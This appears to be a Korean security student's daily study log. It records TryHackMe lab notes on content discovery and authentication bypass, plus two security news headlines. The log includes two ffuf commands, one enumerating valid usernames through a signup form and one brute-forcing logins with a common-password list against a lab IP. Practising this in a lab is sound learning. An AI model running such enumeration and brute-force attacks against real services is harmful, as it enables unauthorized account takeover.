Day planner

---

• CTF || Wargame
• TryHackMe || HTB || 보안 기사 공부 ✅ 2025-07-15
• 보안 뉴스 || 보안 논문 읽기 ✅ 2025-07-15
• Algorithm || Python

Daily Log

---

# GMX 4000만달러 해킹…해커, 화이트햇 보상금 받고 탈취 자산 반환 시작
# KT, 5년간 정보보호 예산 1조 쓴다... SKT발 보안투자 경쟁 ‘활활’

공부 기록

---

#Tryhackme

• Content Discovery
  - Manual discovery
  - Automated discovery
• Subdomain enumeration
• Authentication Bypass
  - username enumeration

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.66.178/customers/signup -mr "username already exists"

여기에서 이미 있는 아이디를 찾고, 찾은 아이디들로 list를 만든다.
그 후에 ID 리스트 + ffuz의 password list로 brute force!

user@tryhackme$ ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.66.178/customers/login -fc 200